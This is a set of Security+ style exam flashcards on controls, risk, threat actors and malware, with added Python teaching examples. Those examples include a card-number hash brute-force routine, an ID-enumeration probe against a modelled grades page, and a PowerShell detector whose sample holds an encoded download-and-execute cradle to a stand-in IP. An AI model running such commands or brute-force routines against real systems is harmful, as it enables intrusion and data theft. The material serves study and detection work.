End of Chapter Questions Flashcards
Matt is updating the organization’s threat assessment process. What category of control is Matt implementing?
a. Operational
b. Technical
c. Corrective
d. Managerial
D. Managerial controls are procedural mechanisms that focus on the mechanics of the risk management process. Threat assessment is an example of one of these activities.
Jade’s organization recently suffered a security breach that affected stored credit card data. Jade’s primary concern is the fact that the organization is subject to sanctions for violating the provisions of the Payment Card Industry Data Security Standard. What category of risk is concerning Jade?
a. Strategic
b. Compliance
c. Operational
d. Financial
B. The breach of credit card information may cause many different impacts on the organization, including compliance, operational, and financial risks. However, in this scenario, Jade’s primary concern is violating PCI DSS, making his concern a compliance risk.
Chris is responding to a security incident that compromised one of his organization’s web servers. He believes that the attackers defaced one or more pages on the website. What cybersecurity objective did this attack violate?
a. Confidentiality
b. Nonrepudiation
c. Integrity
d. Availability
C. The defacement of a website alters content without authorization and is, therefore, a violation of the integrity objective. The attackers may also have breached the confidentiality or availability of the website, but the scenario does not provide us with enough information to draw those conclusions.
Gwen is exploring a customer transaction reporting system and discovers the table shown here. What type of data minimization has most likely been used on this table?
a. Destruction
b. Masking
c. Tokenization
d. Hashing
B. In this case, the first 12 digits of the credit card have been removed and replaced with asterisks. This is an example of data masking.
Tonya is concerned about the risk that an attacker will attempt to gain access to her organization’s database server. She is searching for a control that would discourage the attacker from attempting to gain access. What type of security control is she seeking to implement?
a. Preventive
b. Detective
c. Corrective
d. Deterrent
D. Deterrent controls are designed to prevent an attacker from attempting to violate security policies in the first place. Preventive controls would attempt to block an attack that was about to take place. Corrective controls would remediate the issues that arose during an attack.
Greg is implementing a data loss prevention system. He would like to ensure that it protects against transmissions of sensitive information by guests on his wireless network. What DLP technology would best meet this goal?
A. Watermarking
B. Pattern recognition
C. Host-based
D. Network-based
D. In this case, Greg must use a network-based DLP system. Host-based DLP requires the use of agents, which would not be installed on guest systems. Greg may use watermarking and/or pattern recognition to identify the sensitive information but he must use network-based DLP to meet his goal.
What term best describes data that is being sent between two systems over a network connection?
A. Data at rest
B. Data in motion
C. Data in processing
D. Data in use
B. Data being sent over a network is data in motion. Data at rest is stored data that resides on hard drives, tapes, in the cloud, or on other storage media. Data in processing, or data in use, is data that is actively in use by a computer system.
Tina is tuning her organization’s intrusion prevention system to prevent false positive alerts. What type of control is Tina implementing?
A. Technical control
B. Physical control
C. Managerial control
D. Operational control
A. Technical controls enforce confidentiality, integrity, and availability in the digital space. Examples of technical security controls include firewall rules, access control lists, intrusion prevention systems, and encryption.
Which one of the following is not a common goal of a cybersecurity attacker?
A. Disclosure
B. Denial
C. Alteration
D. Allocation
D. The three primary goals of cybersecurity attackers are disclosure, alteration, and denial. These map directly to the three objectives of cybersecurity professionals: confidentiality, integrity, and availability.
Tony is reviewing the status of his organization’s defenses against a breach of their file server. He believes that a compromise of the file server could reveal information that would prevent the company from continuing to do business. What term best describes the risk that Tony is considering?
A. Strategic
B. Reputational
C. Financial
D. Operational
A. The risk that Tony is contemplating could fit any one of these categories. However, his primary concern is that the company may no longer be able to do business if the risk materializes. This is a strategic risk.
Which one of the following data elements is not commonly associated with identity theft?
A. Social Security number
B. Driver’s license number
C. Frequent flyer number
D. Passport number
C. Although it is possible that a frequent flyer account number, or any other account number for that matter, could be used in identity theft, it is far more likely that identity thieves would use core identity documents. These include drivers’ licenses, passports, and Social Security numbers.
What term best describes an organization’s desired security state?
A. Control objectives
B. Security priorities
C. Strategic goals
D. Best practices
A. As an organization analyzes its risk environment, technical and business leaders determine the level of protection required to preserve the confidentiality, integrity, and availability of their information and systems. They express these requirements by writing the control objectives that the organization wishes to achieve. These control objectives are statements of a desired security state.
Lou mounted the sign below on the fence surrounding his organization’s datacenter. What control type best describes this control?
A. Compensating
B. Detective
C. Physical
D. Deterrent
D. This question is a little tricky. The use of an actual guard dog could be considered a deterrent, physical, or detective control. It could even be a compensating control in some circumstances. However, the question asks about the presence of a sign and does not state that an actual dog is used. The sign only has value as a deterrent control. Be careful when facing exam questions like this to read the details of the question.
What technology uses mathematical algorithms to render information unreadable to those lacking the required key?
A. Data loss prevention
B. Data obfuscation
C. Data minimization
D. Data encryption
D. Encryption technology uses mathematical algorithms to protect information from prying eyes, both while it is in transit over a network and while it resides on systems. Encrypted data is unintelligible to anyone who does not have access to the appropriate decryption key, making it safe to store and transmit encrypted data over otherwise insecure means.
Greg recently conducted an assessment of his organization’s security controls and discovered a potential gap: the organization does not use full-disk encryption on laptops. What type of control gap exists in this case?
A. Detective
B. Corrective
C. Deterrent
D. Preventive
D. The use of full-disk encryption is intended to prevent a security incident from occurring if a device is lost or stolen. Therefore, this is a preventive control gap.
What compliance regulation most directly affects the operations of a healthcare provider?
A. HIPAA
B. PCI DSS
C. GLBA
D. SOX
A. Although a health-care provider may be impacted by any of these regulations, the Health Insurance Portability and Accountability Act (HIPAA) provides direct regulations for the security and privacy of protected health information and would have the most direct impact on a health-care provider.
Nolan is writing an after action report on a security breach that took place in his organization. The attackers stole thousands of customer records from the organization’s database. What cybersecurity principle was most impacted in this breach?
A. Availability
B. Nonrepudiation
C. Confidentiality
D. Integrity
C. The disclosure of sensitive information to unauthorized individuals is a violation of the principle of confidentiality.
Which one of the following objectives is not one of the three main objectives that information security professionals must achieve to protect their organizations against cybersecurity threats?
A. Integrity
B. Nonrepudiation
C. Availability
D. Confidentiality
B. The three primary objectives of cybersecurity professionals are confidentiality, integrity, and availability.
Which one of the following data protection techniques is reversible when conducted properly?
A. Tokenization
B. Masking
C. Hashing
D. Shredding
A. Tokenization techniques use a lookup table and are designed to be reversible by whoever holds the table. Masking and hashing techniques replace the data with values that cannot be reversed back to the original data if performed properly. Shredding, when conducted properly, physically destroys data so that it may not be recovered. One caveat a practitioner should keep in mind: a hash is only irreversible in practice when the input cannot be guessed. Card numbers, Social Security numbers and similar low-entropy identifiers can be brute-forced against an unkeyed hash, which is why hashes of such values should be keyed (an HMAC with a secret key) or replaced with tokenization.
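Added example, not part of the original question set: the masking from Gwen's question and the tokenization and hashing compared here, applied to one constructed test card number. The token vault, the test PAN and the assumption that the 8-digit BIN is public are all illustrative. The last function shows the caveat in practice: with the BIN known and the last four digits visible in a masked display, an unkeyed SHA-256 of the PAN falls to a 10,000-candidate search, while the keyed hash does not.

```python
# Added example (not from the original question set). Applies masking,
# tokenization and hashing to a constructed test PAN, then shows why a plain,
# unkeyed hash of a card number is reversible in practice even though the
# hash function itself is one-way.
import hashlib
import hmac
import secrets
from typing import Dict, Optional

SAMPLE_PAN = "4111111111111111"   # constructed test number, not a real card


def mask_pan(pan: str, visible: int = 4) -> str:
    """Masking: keep the last `visible` digits, replace the rest with '*'."""
    digits = pan.replace(" ", "")
    return "*" * (len(digits) - visible) + digits[-visible:]


def luhn_valid(pan: str) -> bool:
    """Standard Luhn check-digit test used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:            # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


class TokenVault:
    """Tokenization: a random surrogate is stored in a lookup table beside the
    real value. Reversal is possible, but only for whoever holds the table."""

    def __init__(self) -> None:
        self._to_token: Dict[str, str] = {}
        self._to_value: Dict[str, str] = {}

    def tokenize(self, value: str) -> str:
        if value in self._to_token:            # same input -> same token
            return self._to_token[value]
        token = "tok_" + secrets.token_hex(8)
        while token in self._to_value:         # vanishingly rare collision
            token = "tok_" + secrets.token_hex(8)
        self._to_token[value] = token
        self._to_value[token] = value
        return token

    def detokenize(self, token: str) -> str:
        return self._to_value[token]


def plain_sha256(pan: str) -> str:
    """Unkeyed hash: one-way as a function, but the input space is tiny."""
    return hashlib.sha256(pan.encode()).hexdigest()


def keyed_hash(pan: str, key: bytes) -> str:
    """HMAC-SHA256 with a secret key: without the key an attacker cannot test
    candidate PANs against the stored value, so the search below fails."""
    return hmac.new(key, pan.encode(), hashlib.sha256).hexdigest()


def recover_from_plain_hash(target: str, bin8: str, last4: str) -> Optional[str]:
    """Given an unkeyed SHA-256 of a 16-digit PAN, the 8-digit BIN (assumed
    public) and the last four digits (exactly what a masked display reveals),
    only the four middle digits are unknown: 10,000 candidates, fewer after
    the Luhn test. Returns the recovered PAN, or None if no candidate matches."""
    for middle in range(10_000):
        candidate = f"{bin8}{middle:04d}{last4}"
        if luhn_valid(candidate) and plain_sha256(candidate) == target:
            return candidate
    return None
```

Running recover_from_plain_hash against plain_sha256(SAMPLE_PAN) returns the full card number in well under a second; running it against keyed_hash(SAMPLE_PAN, key) returns None for any key the attacker does not hold.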
Which one of the following statements is not true about compensating controls under PCI DSS?
A. Controls used to fulfill one PCI DSS requirement may be used to compensate for the absence of a control needed to meet another requirement.
B. Controls must meet the intent of the original requirement.
C. Controls must meet the rigor of the original requirement.
D. Compensating controls must provide a similar level of defense as the original requirement.
A. PCI DSS compensating controls must be “above and beyond” other PCI DSS requirements. This specifically bans the use of a control used to meet one requirement as a compensating control for another requirement.
Which of the following measures is not commonly used to assess threat intelligence?
A. Timeliness
B. Detail
C. Accuracy
D. Relevance
B. Although higher levels of detail can be useful, they aren’t a common measure used to assess threat intelligence. Instead, the timeliness, accuracy, and relevance of the information are considered critical to determining whether you should use the threat information.
What language is STIX based on?
A. PHP
B. HTML
C. XML
D. Python
C. STIX 1.x is an XML-based language, which allowed it to be extended and modified easily and handled with standard XML editors, readers, and other tools. Note that the current STIX 2.x specification is serialized as JSON rather than XML; the exam answer refers to the original XML-based version.
Kolin is a penetration tester who works for a cybersecurity company. His firm was hired to conduct a penetration test against a health-care system, and Kolin is working to gain access to the systems belonging to a hospital in that system. What term best describes Kolin’s work?
A. White hat
B. Gray hat
C. Green hat
D. Black hat
A. Attacks that are conducted as part of an authorized penetration test are white-hat hacking attacks, regardless of whether they are conducted by internal employees or an external firm. Kolin is, therefore, engaged in white-hat hacking. If he were acting on his own, without authorization, his status would depend on his intent. If he had malicious intent, his activity would be considered black-hat hacking. If he simply intended to report vulnerabilities to the hospital, his attack would be considered gray hat. Green hat is not a commonly used category of attacker.
Which one of the following attackers is most likely to be associated with an APT?
A. Nation-state actor
B. Hacktivist
C. Script kiddie
D. Insider
A. Advanced persistent threats (APTs) are most commonly associated with nation-state actors. It is unlikely that an APT group would leverage the unsophisticated services of a script kiddie. It is also unlikely that a hacktivist would have access to APT resources. Although APTs may take advantage of insider access, they are most commonly associated with nation-state actors.
What organizations did the U.S. government help create to help share knowledge between organizations in specific verticals?
A. DHS
B. SANS
C. CERTS
D. ISACs
D. The U.S. government created the Information Sharing and Analysis Centers (ISACs). ISACs help infrastructure owners and operators share threat information, and provide tools and assistance to their members.
Which of the following threat actors typically has the greatest access to resources?
A. Nation-state actors
B. Organized crime
C. Hacktivists
D. Insider threats
A. Nation-state actors are government sponsored, and they typically have the greatest access to resources, including tools, money, and talent.
Of the threat vectors listed here, which one is most commonly exploited by attackers who are at a distant location?
A. Email
B. Direct access
C. Wireless
D. Removable media
A. Email is the most common threat vector exploited by attackers who use phishing and other social engineering tactics to gain access to an organization. The other vectors listed here, direct access, wireless, and removable media, all require physical proximity to an organization and are not easily executed from a remote location.
Which one of the following is the best example of a hacktivist group?
A. Chinese military
B. U.S. government
C. Russian mafia
D. Anonymous
D. The Chinese military and U.S. government are examples of nation-state actors and advanced persistent threats (APTs). The Russian mafia is an example of a criminal syndicate. Anonymous is the world’s most prominent hacktivist group.
What type of assessment is particularly useful for identifying insider threats?
A. Behavioral
B. Instinctual
C. Habitual
D. IOCs
A. Behavioral assessments are very useful when you are attempting to identify insider threats. Since insider threats are often hard to distinguish from normal behavior, the context of the actions performed—such as after-hours logins, misuse of credentials, logins from abnormal locations, or abnormal patterns—and other behavioral indicators are often used.
Cindy wants to send threat information via a standardized protocol specifically designed to exchange cyber threat information. What should she choose?
A. STIX 1.0
B. OpenIOC
C. STIX 2.0
D. TAXII
D. TAXII, the Trusted Automated eXchange of Indicator Information protocol (renamed Trusted Automated Exchange of Intelligence Information in TAXII 2.x), is specifically designed to transport cyber threat information at the application layer; TAXII 2.x is a RESTful API carried over HTTPS. OpenIOC is a compromise indicator framework, and STIX is a threat description language, not a transport protocol.
Greg believes that an attacker may have installed malicious firmware in a network device before it was provided to his organization by the supplier. What type of threat vector best describes this attack?
A. Supply chain
B. Removable media
C. Cloud
D. Direct access
A. Tampering with equipment before it reaches the intended user is an example of a supply chain threat. It is also possible to describe this attack as a direct access attack because it involved physical access to the device, but supply chain is a more relevant answer. You should be prepared to select the best possible choice from several possible correct answers when you take the exam. Security+ questions often use this type of misdirection.
Ken is conducting threat research on Transport Layer Security (TLS) and would like to consult the authoritative reference for the protocol’s technical specification. What resource would best meet his needs?
A. Academic journal
B. Internet RFCs
C. Subject matter experts
D. Textbooks
B. All of these resources might contain information about the technical details of TLS, but Internet Request for Comments (RFC) documents are the definitive technical standards for Internet protocols. Consulting the RFCs would be Ken’s best option.
Wendy is scanning cloud-based repositories for sensitive information. Which one of the following should concern her most, if discovered in a public repository?
A. Product manuals
B. Source code
C. API keys
D. Open source data
C. All of these items could be concerning, depending on the circumstances. However, API keys should never be found in public repositories because they may grant unauthorized individuals access to information and resources.
Which one of the following threat research tools is used to visually display information about the location of threat actors?
A. Threat map
B. Predictive analysis
C. Vulnerability feed
D. STIX
A. Threat maps are graphical tools that display information about the geographic locations of attackers and their targets. These tools are most often used as interesting marketing gimmicks, but they can also help identify possible threat sources.
Vince recently received the hash values of malicious software that several other firms in his industry found installed on their systems after a compromise. What term best describes this information?
A. Vulnerability feed
B. IoC
C. TTP
D. RFC
B. Specific details of attacks that may be used to identify compromises are known as indicators of compromise (IoCs). This data may also be described as an adversary tool, tactic, or procedure (TTP), but the fact that it is a set of file signatures makes it more closely match the definition of an IoC.
Ursula recently discovered that a group of developers are sharing information over a messaging tool provided by a cloud vendor but not sanctioned by her organization. What term best describes this use of technology?
A. Shadow IT
B. System integration
C. Vendor management
D. Data exfiltration
A. The developers in question are using unapproved technology for business purposes. This is the classic definition of shadow IT. It is possible to describe this as data exfiltration, but there is no indication that the data security has been compromised, so shadow IT is a better description here. Remember, you will often be asked to choose the best answer from multiple correct answers on the exam.
Tom’s organization recently learned that the vendor is discontinuing support for their customer relationship management (CRM) system. What should concern Tom the most from a security perspective?
A. Unavailability of future patches
B. Lack of technical support
C. Theft of customer information
D. Increased costs
A. Tom’s greatest concern should be that running unsupported software exposes his organization to the risk of new, unpatchable vulnerabilities. It is certainly true that they will no longer receive technical support, but this is a less important issue from a security perspective. There is no indication in the scenario that discontinuing the product will result in the theft of customer information or increased costs.
Which one of the following information sources would not be considered an OSINT source?
A. DNS lookup
B. Search engine research
C. Port scans
D. WHOIS queries
C. Port scans are an active reconnaissance technique that probe target systems and would not be considered open source intelligence (OSINT). Search engine research, DNS lookups, and WHOIS queries are all open source resources.
Edward Snowden was a government contractor who disclosed sensitive government documents to journalists to uncover what he believed were unethical activities. Which two of the following terms best describe Snowden’s activities? (Choose two.)
A. Insider
B. State actor
C. Hacktivist
D. APT
E. Organized crime
A, C. As a government contractor, Snowden had authorized access to classified information and exploited this access to make an unauthorized disclosure of that information. This clearly makes him fit into the category of an insider. He did so with political motivations, making him fit the category of hacktivist as well.
Renee is a cybersecurity hobbyist. She receives an email about a new web-based grading system being used by her son’s school and she visits the site. She notices that the URL for the site looks like this:
https://www.myschool.edu/grades.php?studentID=1023425
She realizes that 1023425 is her son’s student ID number and she then attempts to access the following similar URLs:
https://www.myschool.edu/grades.php?studentID=1023423
https://www.myschool.edu/grades.php?studentID=1023424
https://www.myschool.edu/grades.php?studentID=1023426
https://www.myschool.edu/grades.php?studentID=1023427
When she does so, she accesses the records of other students. She closes the records and immediately informs the school principal of the vulnerability. What term best describes Renee’s work?
A. White-hat hacking
B. Green-hat hacking
C. Gray-hat hacking
D. Black-hat hacking
C. Renee was not authorized to perform this security testing, so her work does not fit into the category of white-hat hacking. However, she also does not have malicious intent, so her work cannot be categorized as a black-hat attack. Instead, it fits somewhere in between the two extremes and would best be described as gray-hat hacking.
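Added example, not part of the original question or of any real school system: the flaw Renee found is an insecure direct object reference, where the student ID in the URL is the only thing deciding whose grades come back. The block models that handler next to one that makes the authorization decision from the server-side session, and replays her ID-enumeration test against both. The records, users and parent-to-student mapping are constructed.

```python
# Added example (not from the original question). Vulnerable vs. hardened
# grade lookup, plus a replay of the ID-enumeration probe from the question.
from typing import Callable, Dict, Set
from urllib.parse import parse_qs, urlparse

# Constructed records and entitlements; a real system would read these from
# its database and identity provider.
GRADES: Dict[int, dict] = {
    1023423: {"name": "Student A", "grade": "B+"},
    1023425: {"name": "Student B", "grade": "A-"},
    1023427: {"name": "Student C", "grade": "C"},
}
PARENT_OF: Dict[str, Set[int]] = {"renee": {1023425}}   # Renee's son only


class NotFound(Exception):
    """Raised for both 'no such record' and 'not yours', so the response does
    not become an oracle that reveals which IDs exist."""


def parse_student_id(url: str) -> int:
    """Extract studentID from the query string of a grades.php URL."""
    query = parse_qs(urlparse(url).query)
    return int(query["studentID"][0])


def grades_vulnerable(session_user: str, student_id: int) -> dict:
    # Authentication happened earlier, but the handler never asks whether THIS
    # user may see THIS student. Anyone who can count reads every record.
    return GRADES[student_id]


def grades_hardened(session_user: str, student_id: int) -> dict:
    # The entitlement check uses the server-side session, never the URL.
    allowed = PARENT_OF.get(session_user, set())
    if student_id not in allowed or student_id not in GRADES:
        raise NotFound()
    return GRADES[student_id]


def probe(handler: Callable[[str, int], dict], session_user: str,
          seed_id: int, spread: int = 2) -> Set[int]:
    """Replay Renee's test: request the IDs around the one she was given and
    report which records the handler actually disclosed."""
    disclosed: Set[int] = set()
    for sid in range(seed_id - spread, seed_id + spread + 1):
        try:
            handler(session_user, sid)
            disclosed.add(sid)
        except (LookupError, NotFound):
            continue
    return disclosed
```

Against grades_vulnerable the probe returns every existing neighbouring record; against grades_hardened it returns only the record Renee is entitled to, and nothing at all for a user with no entitlements. A further hardening step, not shown, is to stop exposing the raw database key and give each session an opaque per-user handle instead.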
Gurvinder has been asked to assist a company that recently fired one of their developers. After the developer was terminated, the critical application that they had written for the organization stopped working and now displays a message reading “You shouldn’t have fired me!” If the developer’s access was terminated and the organization does not believe that they would have had access to any systems or code after they left the organization, what type of malware should Gurvinder look for?
A. A RAT
B. A PUP
C. A logic bomb
D. A keylogger
C. A logic bomb is a type of malware that activates when specific conditions are met. Here the trigger could have been the developer’s account disappearing from payroll or the directory, a periodic check-in or input that the developer stopped providing, a date, or some other condition. A RAT is a remote access Trojan, a PUP is a potentially unwanted program, and a keylogger steals user input.
Naomi believes that an attacker has compromised a Windows workstation using a fileless malware package. What Windows scripting tool was most likely used to download and execute the malware?
A. VBScript
B. Python
C. Bash
D. PowerShell
D. PowerShell is the most likely tool for this type of exploit: it is present on every modern Windows system and can download and run code entirely in memory, which is what makes the attack fileless. VBScript is more typically seen inside Office macros or .vbs droppers, and Bash and Python are not installed on Windows by default and are far more likely to be found on a Linux system.
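Added example, not from the original question: what a detection engineer does with the clue in this answer. Given process-creation command lines, it finds powershell.exe launches, decodes any -EncodedCommand payload (PowerShell takes base64 of the script encoded as UTF-16LE) and looks for the download-and-run cradles that fileless malware relies on. The three command lines are constructed to look like process-creation events; they are not real logs, and the thresholds for raising an alert are assumptions.

```python
# Added example (not from the original question). Decodes PowerShell
# -EncodedCommand payloads and flags fileless-malware tradecraft in
# process-creation command lines. Sample lines are constructed.
import base64
import re
from typing import Dict, List, Optional

CRADLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
ENCODED_BLOB = base64.b64encode(CRADLE_SCRIPT.encode("utf-16le")).decode()

SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand " + ENCODED_BLOB,
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Get-ChildItem C:\Users"',
    "cmd.exe /c dir",
]

PS_BINARY = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?\b", re.I)
# PowerShell accepts -e, -ec, -enc and -encodedcommand for the same switch.
ENCODED_ARG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
POLICY_BYPASS = re.compile(r"-e[xp]\w*\s+bypass", re.I)
CRADLE_PATTERNS = re.compile(
    r"\bIEX\b|Invoke-Expression|DownloadString|DownloadFile|Invoke-WebRequest|"
    r"\biwr\b|Start-BitsTransfer|FromBase64String",
    re.I,
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> Dict[str, object]:
    """Score one process-creation command line for fileless PowerShell use."""
    indicators: List[str] = []
    decoded: Optional[str] = None
    if PS_BINARY.search(cmdline):
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            indicators.append("encoded_command")
        if HIDDEN_WINDOW.search(cmdline):
            indicators.append("hidden_window")
        if POLICY_BYPASS.search(cmdline):
            indicators.append("execution_policy_bypass")
        # Search the visible arguments (with the base64 blob removed so it
        # cannot produce chance matches) together with the decoded script.
        visible = ENCODED_ARG.sub("-EncodedCommand <blob>", cmdline)
        if CRADLE_PATTERNS.search(visible + " " + (decoded or "")):
            indicators.append("download_cradle")
    return {
        "cmdline": cmdline,
        "decoded": decoded,
        "indicators": indicators,
        # Assumed alert threshold: a cradle, or two evasion flags together.
        "suspicious": "download_cradle" in indicators or len(indicators) >= 2,
    }


def analyze_all(lines: List[str] = SAMPLE_COMMAND_LINES) -> List[Dict[str, object]]:
    return [analyze(line) for line in lines]
```

The same logic applies to Windows event 4688 command lines, Sysmon event 1, or PowerShell script block logging (event 4104), where the decoded script is already present and only the cradle patterns need to be checked.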
Scott notices that one of the systems on his network contacted a number of systems via encrypted web traffic, downloaded a handful of files, and then uploaded a large amount of data to a remote system. What type of infection should he look for?
A. A keylogger
B. A backdoor
C. A bot
D. A logic bomb
C. The behaviors that Scott is seeing are characteristic of a bot infection. The bot was likely contacting command-and-control hosts, then downloading updates and/or additional packages, then uploading data from his organization. He will need to determine if sensitive or important business information was present on the system or accessible from it. Keyloggers will capture keystrokes and user input but would typically require additional malware packages to display this behavior. A logic bomb might activate after an event, but no event is described, and a backdoor is used for remote access.
Amanda notices traffic between her systems and a known malicious host on TCP port 6667. What type of traffic is she most likely detecting?
A. Command and control
B. A hijacked web browser
C. A RAT
D. A worm
A. Amanda has most likely discovered a botnet’s command-and-control (C&C) channel: TCP port 6667 is the standard IRC port, and the system or systems she is monitoring are probably using IRC as the C&C channel. A RAT is more likely to use a different control channel, worms spread by attacking vulnerable services, and a hijacked web browser would probably operate on common HTTP or HTTPS ports (80/443).
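Added example serving the two scenarios above (Scott's host that downloads from several systems and then uploads a large volume, and Amanda's TCP 6667 traffic to a known malicious host). It is not from the original questions. The flow records are constructed in the shape of a NetFlow or Zeek conn summary, the known-bad address stands in for a threat feed entry, and the byte thresholds are illustrative assumptions a team would tune to its own baseline.

```python
# Added example (not from the original questions). Flow-level detection of a
# download-then-bulk-upload bot pattern and of IRC-port / known-bad C&C traffic.
# All flows, addresses and thresholds are constructed for illustration.
from collections import defaultdict
from typing import Dict, List, NamedTuple, Set


class Flow(NamedTuple):
    ts: int          # seconds since epoch
    src: str         # internal host
    dst: str         # remote host
    dport: int
    bytes_out: int   # src -> dst
    bytes_in: int    # dst -> src


KNOWN_BAD: Set[str] = {"192.0.2.44"}                      # constructed feed entry
IRC_PORTS: Set[int] = {6665, 6666, 6667, 6668, 6669, 6697}
MB = 1_000_000

# Constructed flows: 10.0.0.7 shows the bot pattern, 10.0.0.8 talks IRC to a
# known bad host, 10.0.0.9 is ordinary browsing.
SAMPLE_FLOWS: List[Flow] = [
    Flow(1000, "10.0.0.7", "198.51.100.21", 443, 40_000, 2 * MB),
    Flow(1030, "10.0.0.7", "198.51.100.22", 443, 35_000, 3 * MB),
    Flow(1060, "10.0.0.7", "198.51.100.23", 443, 30_000, 1 * MB),
    Flow(1300, "10.0.0.7", "203.0.113.9", 443, 900 * MB, 50_000),
    Flow(1000, "10.0.0.8", "192.0.2.44", 6667, 4_000, 6_000),
    Flow(1600, "10.0.0.8", "192.0.2.44", 6667, 4_100, 5_900),
    Flow(1000, "10.0.0.9", "198.51.100.30", 443, 60_000, 5 * MB),
    Flow(1200, "10.0.0.9", "198.51.100.31", 443, 80_000, 8 * MB),
]


def detect(flows: List[Flow], *, download_min: int = 1 * MB,
           download_peers: int = 3, upload_min: int = 100 * MB,
           ratio: float = 10.0) -> Dict[str, Set[str]]:
    """Return {internal host: set of rule names that fired}."""
    findings: Dict[str, Set[str]] = defaultdict(set)
    by_src: Dict[str, List[Flow]] = defaultdict(list)
    for f in flows:
        by_src[f.src].append(f)
        if f.dst in KNOWN_BAD:
            findings[f.src].add("known_bad_host")
        if f.dport in IRC_PORTS:
            findings[f.src].add("irc_port_c2")
    for src, host_flows in by_src.items():
        host_flows.sort(key=lambda f: f.ts)
        # Rule: sizeable downloads from several distinct peers, followed later
        # by one upload that dwarfs what the host received in that flow.
        download_hosts: Set[str] = set()
        for f in host_flows:
            if f.bytes_in >= download_min:
                download_hosts.add(f.dst)
            if (len(download_hosts) >= download_peers
                    and f.bytes_out >= upload_min
                    and f.bytes_out >= ratio * f.bytes_in):
                findings[src].add("download_then_bulk_upload")
    return dict(findings)
```

The IRC rule is deliberately port-based to match the question; in practice it should be paired with protocol identification, since C&C on 6667 can be disguised and IRC can run on any port.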
Mike discovers that attackers have left software that allows them to have remote access to systems on a computer in his company’s network. How should he describe or classify this malware?
A. A worm
B. Crypto malware
C. A Trojan
D. A backdoor
D. Remote access to a system is typically provided by a backdoor. Backdoors may also appear in firmware or even in hardware. None of the other items listed provide remote access by default, although they may have a backdoor as part of a more capable malware package.
Naomi wants to provide guidance on how to keep her organization’s new machine learning tools secure. Which of the following is not a common means of securing machine learning algorithms?
A. Understand the quality of the source data
B. Build a secure working environment for ML developers
C. Require third-party review for bias in ML algorithms
D. Ensure changes to ML algorithms are reviewed and tested
C. Requiring third-party review of ML algorithms is not a common requirement, but ensuring that you use high-quality source data, that the working environment remains secure, and that changes are reviewed and tested are all common best practices for ML algorithm security.
What type of malware is adware typically classified as?
A. A DOG
B. A backdoor
C. A PUP
D. A rootkit
C. Adware is typically classified as a type of potentially unwanted program, or PUP. Backdoors and rootkits are definitely malicious, whereas adware may simply be unwanted and annoying. A DOG is not a term commonly used to describe malware.
Matt uploads a malware sample to a third-party malware scanning site that uses multiple antimalware and antivirus engines to scan the sample. He receives several different answers for what the malware package is. What has occurred?
A. The package contains more than one piece of malware.
B. The service is misconfigured.
C. The malware is polymorphic and changed while being tested.
D. Different vendors use different names for malware packages.
D. One of the challenges security practitioners can face when attempting to identify malware is that different antivirus and antimalware vendors will name malware packages and families differently. This means that Matt may need to look at different names to figure out what he is dealing with.
Nancy is concerned that there is a software keylogger on the system she is investigating. What data may have been stolen?
A. All files on the system
B. All keyboard input
C. All files the user accessed while the keylogger was active
D. Keyboard and other input from the user
D. Though keyloggers often focus on keyboard input, other types of input may also be captured, meaning Nancy should worry about any user input that occurred while the keylogger was installed. Keyloggers typically do not target files on systems, although if Nancy finds a keylogger she may want to check for other malware packages with additional capabilities.
Crypto malware is a type of what sort of malware?
A. Worms
B. PUP
C. Ransomware
D. Rootkit
C. Crypto malware, a type of ransomware, typically demands payment to decrypt critical files or entire drives. PUPs are potentially unwanted programs like spyware and adware, whereas rootkits are used to gain control of systems without being detected and worms self-spread by exploiting vulnerabilities.
Rick believes that a system he is responsible for has been compromised with malware that uses a rootkit to obtain and retain access to the system. When he runs a virus scan, the system doesn’t show any malware. If he has other data that indicates the system is infected, what should his next step be if he wants to determine what malware may be on the system?
A. Rerun the antimalware scan.
B. Mount the drive on another system and scan it that way.
C. Disable the system’s antivirus because it may be causing a false negative.
D. The system is not infected and he should move on.
B. Rootkits are designed to hide from antimalware scanners and can often defeat locally run scans. Mounting the drive in another system in read-only mode, or booting from a USB drive and scanning using a trusted, known good operating system, can be an effective way to determine what malware is on a potentially infected system.
Tracy is concerned about attacks against the machine learning algorithm that her organization is using to assess their network. What step should she take to ensure that her baseline data is not tainted?
A. She should scan all systems on the network for vulnerabilities and remediate them before using the algorithm.
B. She should run the ML algorithm on the network only if she believes it is secure.
C. She should disable outbound and inbound network access so that only normal internal traffic is validated.
D. She should disable all firewall rules so that all potential traffic can be validated.
B. If Tracy is worried about baselining her network and having tainted data, she needs to ensure that no malicious activity is occurring when she runs the baseline data capture. That way, the machine learning algorithm will only be working with normal traffic patterns and behaviors and can then detect and alert on things that are abnormal.
Selah wants to ensure that malware is completely removed from a system. What should she do to ensure this?
A. Run multiple antimalware tools and use them to remove all detections.
B. Wipe the drive and reinstall from known good media.
C. Use the delete setting in her antimalware software rather than the quarantine setting.
D. There is no way to ensure the system is safe and it should be destroyed.
B. In most malware infection scenarios, wiping the drive and reinstalling from known good media is the best option available. If the malware can infect the system firmware (BIOS/UEFI), even this may not be sufficient, but firmware-resident malware is relatively uncommon. Multiple antivirus and antimalware tools, even if they are set to delete malware, may still fail against unknown or advanced malware packages. Destroying systems is uncommon and expensive and is unlikely to be acceptable to most organizations as a means of dealing with a malware infection.
What type of malware is frequently called stalkerware because of its use by those in intimate relationships to spy on their partners?
A. Worms
B. RATs
C. Crypto malware
D. PUPs
B. RATs, or remote access Trojans, are sometimes called stalkerware because they are often utilized by those in intimate relationships to spy on their partners. They provide remote access and other capabilities to computers and mobile devices.
